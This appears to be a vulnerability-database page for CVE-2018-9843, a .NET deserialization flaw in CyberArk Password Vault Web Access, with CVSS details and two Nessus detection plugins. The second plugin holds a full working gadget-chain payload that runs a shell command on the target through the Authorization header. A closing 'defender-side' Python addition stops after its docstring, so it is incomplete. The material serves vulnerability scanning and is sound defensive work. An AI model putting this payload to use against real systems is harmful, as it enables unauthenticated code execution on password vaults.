CVE-2018-9843 - Deserialization of Untrusted Data vulnerability in Cyberark Password Vault 10.0

047910
CVSS 7.5 - HIGH
Attack vector: NETWORK
Attack complexity: LOW
Privileges required: NONE
Confidentiality impact: PARTIAL
Integrity impact: PARTIAL
Availability impact: PARTIAL
Tags: network, low complexity, cyberark, CWE-502, nessus, exploit available

Summary

The REST API in CyberArk Password Vault Web Access before 9.9.5 and 10.x before 10.1 allows remote attackers to execute arbitrary code via a serialized .NET object in an Authorization HTTP header.

Vulnerable Configurations

Part         Description   Count
Application  Cyberark      2

Common Weakness Enumeration (CWE)

Exploit-Db

description: CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution. CVE-2018-9843. Webapps exploit for JSON platform
file: exploits/json/webapps/44429.txt
id: EDB-ID:44429
last seen: 2018-05-24
modified: 2018-04-09
platform: json
published: 2018-04-09
reporter: Exploit-DB
source: https://www.exploit-db.com/download/44429/
title: CyberArk Password Vault Web Access < 9.9.5 / < 9.10 / 10.1 - Remote Code Execution
type: webapps

Nessus

  • NASL family: CGI abuses
    NASL id: CYBERARK_PASSWORD_VAULT_9_9_5.NASL
    description: The version of CyberArk Password Vault Web Access running on the remote host is prior to 9.9.5, 9.10.x prior to 9.10.1, or is version 10.1. It is, therefore, vulnerable to a remote code execution vulnerability. Note that Nessus has not tested for this issue but has instead relied only on the application's self-reported version number.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 108952
    published: 2018-04-10
    reporter: This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/108952
    title: CyberArk Password Vault Web Access .NET Object Deserialization
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(108952);
      script_version("1.10");
      script_cvs_date("Date: 2019/10/07 15:15:27");
    
      script_cve_id("CVE-2018-9843");
      script_bugtraq_id(105180);
      script_xref(name:"IAVB", value:"2018-B-0121");
    
      script_name(english:"CyberArk Password Vault Web Access .NET Object Deserialization");
      script_summary(english:"Looks for the product and version in the logon page.");
    
      script_set_attribute(attribute:"synopsis", value:
    "An Identity Management application running on the remote host is affected by
    a remote code execution vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The version of CyberArk Password Vault Web Access running on the
    remote host is prior to 9.9.5, 9.10.x prior to 9.10.1, or is version
    10.1. It is, therefore, vulnerable to a remote code execution
    vulnerability.
    
    Note that Nessus has not tested for this issue but has instead relied
    only on the application's self-reported version number.
    ");
      # https://www.redteam-pentesting.de/en/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e1d84c64");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to CyberArk Password Vault 9.9.5, 9.10.1, 10.2 or Later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-9843");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/09");
      script_set_attribute(attribute:"patch_publication_date", value:"2018/02/28");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/04/10");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:cyberark:password_vault");
      script_set_attribute(attribute:"stig_severity", value:"I");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("cyberark_password_vault_detection.nbin");
      script_require_keys("Settings/ParanoidReport");
      script_require_ports("Services/www", 80, 443);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("vcf.inc");
    include("vcf_extras.inc");
    
    if (report_paranoia < 2) audit(AUDIT_PARANOID);
    
    port = get_http_port(default:80);
    app = vcf::get_app_info(app:"CyberArk Password Vault Web Access", webapp:TRUE, port:port);
    
    constraints = 
    [
      {"min_version" : "0.0.0", "fixed_version" : "9.9.5"},
      {"min_version" : "9.10.0", "fixed_version" : "9.10.1"},
      {"min_version" : "10.1",  "fixed_version" : "10.2"}
    ];
    
    vcf::check_version_and_report(app_info:app, constraints:constraints, severity:SECURITY_HOLE, strict:FALSE);
    
  • NASL family: CGI abuses
    NASL id: CYBERARK_PVWA_CVE-2018-9843.NASL
    description: The CyberArk Password Vault Web Access running on the remote host is affected by a remote code execution vulnerability due to unsafe deserialization of a .NET object. An unauthenticated, remote attacker can exploit this, via a crafted .NET object, to execute arbitrary .NET code in the context of the IIS server.
    last seen: 2020-06-01
    modified: 2020-06-02
    plugin id: 110287
    published: 2018-06-01
    reporter: This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.
    source: https://www.tenable.com/plugins/nessus/110287
    title: CyberArk Password Vault Web Access .NET Object Deserialization (Direct Check)
    code:
    #
    # (C) Tenable Network Security, Inc.
    #
    
    include("compat.inc");
    
    if (description)
    {
      script_id(110287);
      script_version("1.5");
      script_cvs_date("Date: 2019/10/07 15:15:27");
    
      script_cve_id("CVE-2018-9843");
      script_bugtraq_id(105180);
    
      script_name(english:"CyberArk Password Vault Web Access .NET Object Deserialization (Direct Check)");
      script_summary(english:"Sends a .NET object to trigger an error message.");
    
      script_set_attribute(attribute:"synopsis", value:
    "An Identity Management application running on the remote host is affected by
    a remote code execution vulnerability.");
      script_set_attribute(attribute:"description", value:
    "The CyberArk Password Vault Web Access running on the remote host is
    affected by a remote code execution vulnerability due to unsafe
    deserialization of a .NET object. An unauthenticated, remote
    attacker can exploit this, via a crafted .NET object, to execute
    arbitrary .NET code in the context of the IIS server.");
    
      # https://www.redteam-pentesting.de/en/advisories/rt-sa-2017-014/-cyberark-password-vault-web-access-remote-code-execution
      script_set_attribute(attribute:"see_also", value:"http://www.nessus.org/u?e1d84c64");
      script_set_attribute(attribute:"solution", value:
    "Upgrade to CyberArk Password Vault Web Access 9.9.5, 9.10.1, 10.2 or Later.");
      script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P");
      script_set_cvss_temporal_vector("CVSS2#E:POC/RL:OF/RC:C");
      script_set_cvss3_base_vector("CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H");
      script_set_cvss3_temporal_vector("CVSS:3.0/E:P/RL:O/RC:C");
      script_set_attribute(attribute:"cvss_score_source", value:"CVE-2018-9843");
      script_set_attribute(attribute:"exploitability_ease", value:"Exploits are available");
      script_set_attribute(attribute:"exploit_available", value:"true");
    
      script_set_attribute(attribute:"vuln_publication_date", value:"2018/04/09");
      script_set_attribute(attribute:"patch_publication_date", value:"2018/02/28");
      script_set_attribute(attribute:"plugin_publication_date", value:"2018/06/01");
    
      script_set_attribute(attribute:"plugin_type", value:"remote");
      script_set_attribute(attribute:"cpe", value:"cpe:/a:cyberark:password_vault");
      script_end_attributes();
    
      script_category(ACT_GATHER_INFO);
      script_family(english:"CGI abuses");
    
      script_copyright(english:"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.");
    
      script_dependencies("cyberark_password_vault_detection.nbin");
      script_require_keys("installed_sw/CyberArk Password Vault Web Access");
      script_require_ports("Services/www", 80, 443);
    
      exit(0);
    }
    
    include("audit.inc");
    include("global_settings.inc");
    include("misc_func.inc");
    include("http.inc");
    include("install_func.inc");
    
    app   = 'CyberArk Password Vault Web Access';
    
    # Plugin will exit if app is not detected on host
    get_install_count(app_name:app, exit_if_zero:TRUE);
    
    # Plugin will exit if app is not detected on this port
    port = get_http_port(default:80);
    install = get_single_install(app_name:app, port:port, exit_if_unknown_ver:FALSE);
    
    url = "/PasswordVault/WebServices/PIMServices.svc/Applications/?Location=\&IncludeSublocations=true";
    
    cmd = 'ping -n 3 localhost';
    
    # vuln verification 
    #cmd = 'dir > c:\\Windows\\Temp\\hacked.txt';
    
    cmd = '/c ' + cmd;
    
    obj = raw_string(
    0x00,0x01,0x00,0x00,0x00,0xFF,0xFF,0xFF,0xFF,0x01,0x00,0x00,0x00,0x00,0x00,0x00,
    0x00,0x0C,0x02,0x00,0x00,0x00,0x49,0x53,0x79,0x73,0x74,0x65,0x6D,0x2C,0x20,0x56,
    0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,
    0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,
    0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,
    0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,
    0x05,0x01,0x00,0x00,0x00,0x84,0x01,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,
    0x6C,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x73,0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,
    0x63,0x2E,0x53,0x6F,0x72,0x74,0x65,0x64,0x53,0x65,0x74,0x60,0x31,0x5B,0x5B,0x53,
    0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,
    0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,
    0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,
    0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,
    0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,
    0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x04,0x00,0x00,0x00,0x05,
    0x43,0x6F,0x75,0x6E,0x74,0x08,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,0x07,0x56,
    0x65,0x72,0x73,0x69,0x6F,0x6E,0x05,0x49,0x74,0x65,0x6D,0x73,0x00,0x03,0x00,0x06,
    0x08,0x8D,0x01,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6C,0x6C,0x65,0x63,
    0x74,0x69,0x6F,0x6E,0x73,0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,0x2E,0x43,0x6F,
    0x6D,0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,
    0x60,0x31,0x5B,0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
    0x67,0x2C,0x20,0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,
    0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,
    0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,
    0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,
    0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,
    0x08,0x02,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x09,0x03,0x00,0x00,0x00,0x02,0x00,
    0x00,0x00,0x09,0x04,0x00,0x00,0x00,0x04,0x03,0x00,0x00,0x00,0x8D,0x01,0x53,0x79,
    0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6C,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x73,
    0x2E,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,0x2E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x69,
    0x73,0x6F,0x6E,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x72,0x60,0x31,0x5B,0x5B,0x53,
    0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,
    0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,
    0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,
    0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,
    0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,
    0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x01,0x00,0x00,0x00,0x0B,
    0x5F,0x63,0x6F,0x6D,0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x03,0x22,0x53,0x79,0x73,
    0x74,0x65,0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,
    0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x09,
    0x05,0x00,0x00,0x00,0x11,0x04,0x00,0x00,0x00,0x02,0x00,0x00,0x00,0x06,0x06,0x00,
    0x00) +
    mkword(strlen(cmd)) + cmd +
    raw_string(
    0x06,0x07,0x00,0x00,0x00,0x03,0x63,0x6D,
    0x64,0x04,0x05,0x00,0x00,0x00,0x22,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x65,
    0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,
    0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x03,0x00,0x00,0x00,0x08,0x44,0x65,
    0x6C,0x65,0x67,0x61,0x74,0x65,0x07,0x6D,0x65,0x74,0x68,0x6F,0x64,0x30,0x07,0x6D,
    0x65,0x74,0x68,0x6F,0x64,0x31,0x03,0x03,0x03,0x30,0x53,0x79,0x73,0x74,0x65,0x6D,
    0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,
    0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2B,0x44,0x65,0x6C,
    0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x2F,0x53,0x79,0x73,0x74,0x65,
    0x6D,0x2E,0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,
    0x62,0x65,0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,
    0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2F,0x53,0x79,0x73,0x74,0x65,
    0x6D,0x2E,0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,
    0x62,0x65,0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,
    0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x09,0x08,0x00,0x00,0x00,0x09,
    0x09,0x00,0x00,0x00,0x09,0x0A,0x00,0x00,0x00,0x04,0x08,0x00,0x00,0x00,0x30,0x53,
    0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,
    0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,
    0x72,0x2B,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x07,
    0x00,0x00,0x00,0x04,0x74,0x79,0x70,0x65,0x08,0x61,0x73,0x73,0x65,0x6D,0x62,0x6C,
    0x79,0x06,0x74,0x61,0x72,0x67,0x65,0x74,0x12,0x74,0x61,0x72,0x67,0x65,0x74,0x54,
    0x79,0x70,0x65,0x41,0x73,0x73,0x65,0x6D,0x62,0x6C,0x79,0x0E,0x74,0x61,0x72,0x67,
    0x65,0x74,0x54,0x79,0x70,0x65,0x4E,0x61,0x6D,0x65,0x0A,0x6D,0x65,0x74,0x68,0x6F,
    0x64,0x4E,0x61,0x6D,0x65,0x0D,0x64,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,
    0x74,0x72,0x79,0x01,0x01,0x02,0x01,0x01,0x01,0x03,0x30,0x53,0x79,0x73,0x74,0x65,
    0x6D,0x2E,0x44,0x65,0x6C,0x65,0x67,0x61,0x74,0x65,0x53,0x65,0x72,0x69,0x61,0x6C,
    0x69,0x7A,0x61,0x74,0x69,0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x2B,0x44,0x65,
    0x6C,0x65,0x67,0x61,0x74,0x65,0x45,0x6E,0x74,0x72,0x79,0x06,0x0B,0x00,0x00,0x00,
    0xB0,0x02,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x46,0x75,0x6E,0x63,0x60,0x33,0x5B,
    0x5B,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,
    0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,
    0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,
    0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,
    0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,
    0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x2C,0x5B,0x53,0x79,
    0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,0x63,
    0x6F,0x72,0x6C,0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,
    0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,
    0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,
    0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,
    0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,0x5D,0x2C,0x5B,0x53,0x79,0x73,0x74,0x65,
    0x6D,0x2E,0x44,0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,
    0x6F,0x63,0x65,0x73,0x73,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2C,0x20,0x56,
    0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,0x30,0x2C,0x20,
    0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,0x61,0x6C,0x2C,
    0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,0x65,0x6E,0x3D,
    0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,0x30,0x38,0x39,
    0x5D,0x5D,0x06,0x0C,0x00,0x00,0x00,0x4B,0x6D,0x73,0x63,0x6F,0x72,0x6C,0x69,0x62,
    0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,
    0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,
    0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,
    0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,
    0x30,0x38,0x39,0x0A,0x06,0x0D,0x00,0x00,0x00,0x49,0x53,0x79,0x73,0x74,0x65,0x6D,
    0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,0x30,0x2E,
    0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,0x74,0x72,
    0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,0x6F,0x6B,
    0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,0x34,0x65,
    0x30,0x38,0x39,0x06,0x0E,0x00,0x00,0x00,0x1A,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
    0x44,0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,
    0x65,0x73,0x73,0x06,0x0F,0x00,0x00,0x00,0x05,0x53,0x74,0x61,0x72,0x74,0x09,0x10,
    0x00,0x00,0x00,0x04,0x09,0x00,0x00,0x00,0x2F,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
    0x52,0x65,0x66,0x6C,0x65,0x63,0x74,0x69,0x6F,0x6E,0x2E,0x4D,0x65,0x6D,0x62,0x65,
    0x72,0x49,0x6E,0x66,0x6F,0x53,0x65,0x72,0x69,0x61,0x6C,0x69,0x7A,0x61,0x74,0x69,
    0x6F,0x6E,0x48,0x6F,0x6C,0x64,0x65,0x72,0x07,0x00,0x00,0x00,0x04,0x4E,0x61,0x6D,
    0x65,0x0C,0x41,0x73,0x73,0x65,0x6D,0x62,0x6C,0x79,0x4E,0x61,0x6D,0x65,0x09,0x43,
    0x6C,0x61,0x73,0x73,0x4E,0x61,0x6D,0x65,0x09,0x53,0x69,0x67,0x6E,0x61,0x74,0x75,
    0x72,0x65,0x0A,0x53,0x69,0x67,0x6E,0x61,0x74,0x75,0x72,0x65,0x32,0x0A,0x4D,0x65,
    0x6D,0x62,0x65,0x72,0x54,0x79,0x70,0x65,0x10,0x47,0x65,0x6E,0x65,0x72,0x69,0x63,
    0x41,0x72,0x67,0x75,0x6D,0x65,0x6E,0x74,0x73,0x01,0x01,0x01,0x01,0x01,0x00,0x03,
    0x08,0x0D,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x54,0x79,0x70,0x65,0x5B,0x5D,0x09,
    0x0F,0x00,0x00,0x00,0x09,0x0D,0x00,0x00,0x00,0x09,0x0E,0x00,0x00,0x00,0x06,0x14,
    0x00,0x00,0x00,0x3E,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,0x69,0x61,0x67,0x6E,
    0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,0x65,0x73,0x73,0x20,0x53,
    0x74,0x61,0x72,0x74,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,
    0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
    0x67,0x29,0x06,0x15,0x00,0x00,0x00,0x3E,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x44,
    0x69,0x61,0x67,0x6E,0x6F,0x73,0x74,0x69,0x63,0x73,0x2E,0x50,0x72,0x6F,0x63,0x65,
    0x73,0x73,0x20,0x53,0x74,0x61,0x72,0x74,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,
    0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,
    0x74,0x72,0x69,0x6E,0x67,0x29,0x08,0x00,0x00,0x00,0x0A,0x01,0x0A,0x00,0x00,0x00,
    0x09,0x00,0x00,0x00,0x06,0x16,0x00,0x00,0x00,0x07,0x43,0x6F,0x6D,0x70,0x61,0x72,
    0x65,0x09,0x0C,0x00,0x00,0x00,0x06,0x18,0x00,0x00,0x00,0x0D,0x53,0x79,0x73,0x74,
    0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x06,0x19,0x00,0x00,0x00,0x2B,0x49,
    0x6E,0x74,0x33,0x32,0x20,0x43,0x6F,0x6D,0x70,0x61,0x72,0x65,0x28,0x53,0x79,0x73,
    0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,
    0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x29,0x06,0x1A,0x00,0x00,0x00,0x32,
    0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x49,0x6E,0x74,0x33,0x32,0x20,0x43,0x6F,0x6D,
    0x70,0x61,0x72,0x65,0x28,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,
    0x6E,0x67,0x2C,0x20,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,
    0x67,0x29,0x08,0x00,0x00,0x00,0x0A,0x01,0x10,0x00,0x00,0x00,0x08,0x00,0x00,0x00,
    0x06,0x1B,0x00,0x00,0x00,0x71,0x53,0x79,0x73,0x74,0x65,0x6D,0x2E,0x43,0x6F,0x6D,
    0x70,0x61,0x72,0x69,0x73,0x6F,0x6E,0x60,0x31,0x5B,0x5B,0x53,0x79,0x73,0x74,0x65,
    0x6D,0x2E,0x53,0x74,0x72,0x69,0x6E,0x67,0x2C,0x20,0x6D,0x73,0x63,0x6F,0x72,0x6C,
    0x69,0x62,0x2C,0x20,0x56,0x65,0x72,0x73,0x69,0x6F,0x6E,0x3D,0x34,0x2E,0x30,0x2E,
    0x30,0x2E,0x30,0x2C,0x20,0x43,0x75,0x6C,0x74,0x75,0x72,0x65,0x3D,0x6E,0x65,0x75,
    0x74,0x72,0x61,0x6C,0x2C,0x20,0x50,0x75,0x62,0x6C,0x69,0x63,0x4B,0x65,0x79,0x54,
    0x6F,0x6B,0x65,0x6E,0x3D,0x62,0x37,0x37,0x61,0x35,0x63,0x35,0x36,0x31,0x39,0x33,
    0x34,0x65,0x30,0x38,0x39,0x5D,0x5D,0x09,0x0C,0x00,0x00,0x00,0x0A,0x09,0x0C,0x00,
    0x00,0x00,0x09,0x18,0x00,0x00,0x00,0x09,0x16,0x00,0x00,0x00,0x0A,0x0B
    ); 
    
    # PVWA can be slow to respond
    http_set_read_timeout(30);
    
    token = base64(str: obj);
    res = http_send_recv3(
            port        : port, 
            method      : 'GET',
            item        : url,
            add_headers : make_array('authorization', token),
            content_type: 'application/json',
            fetch404    : TRUE,
            exit_on_fail: TRUE
          );
    
    if(isnull(res[2]))
      audit(AUDIT_RESP_NOT, port, 'a GET request: No data in the response body');
    
    # 
    # Patched:
    # 403 
    # {"ErrorCode":"CAWS00001E","ErrorMessage":"Connection to the Vault was terminated."}
    if (res[2] !~ "Unable to cast object of type.* to type 'CyberArk.Services.Web.SessionIdentifiers")
    {
      audit(AUDIT_INST_VER_NOT_VULN, app, install['version']);
    }
    
    #
    # Vulnerable:
    # 403
    # {"ErrorCode":"CAWS00001E","ErrorMessage":"Error raised while trying to establish session using session token provided. Error: Unable to cast object of type 'System.Collections.Generic.SortedSet`1[System.String]' to type 'CyberArk.Services.Web.SessionIdentifiers'."}
    #
    report =
      '\nNessus was able to detect the .NET deserialization vulnerability by' +
      '\nsending a crafted .NET object.' +
      '\n';
    security_report_v4(port:port, severity:SECURITY_HOLE, extra:report);
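
A defender-side counterpart to the direct check above, added here as an example (it is not part of this page, of Tenable's plugin, or of CyberArk's product): it triages Authorization header values the way a WAF or log pipeline could, flagging ones that decode to a .NET BinaryFormatter stream or name a type from the gadget chain, and it recognises the cast error the plugin's comments document for a vulnerable PVWA. The header layout, marker type names and sample inputs are assumptions drawn from the plugin code and comments, and the samples are constructed rather than captured traffic.

```python
"""Defender-side triage for CVE-2018-9843-style probes against PVWA.

Added example; not part of this page or of Tenable's plugin. The PVWA REST
API expected a session token in the Authorization header, so a value that
decodes to a .NET BinaryFormatter stream is never legitimate. The samples
at the bottom are constructed, not captured traffic.
"""
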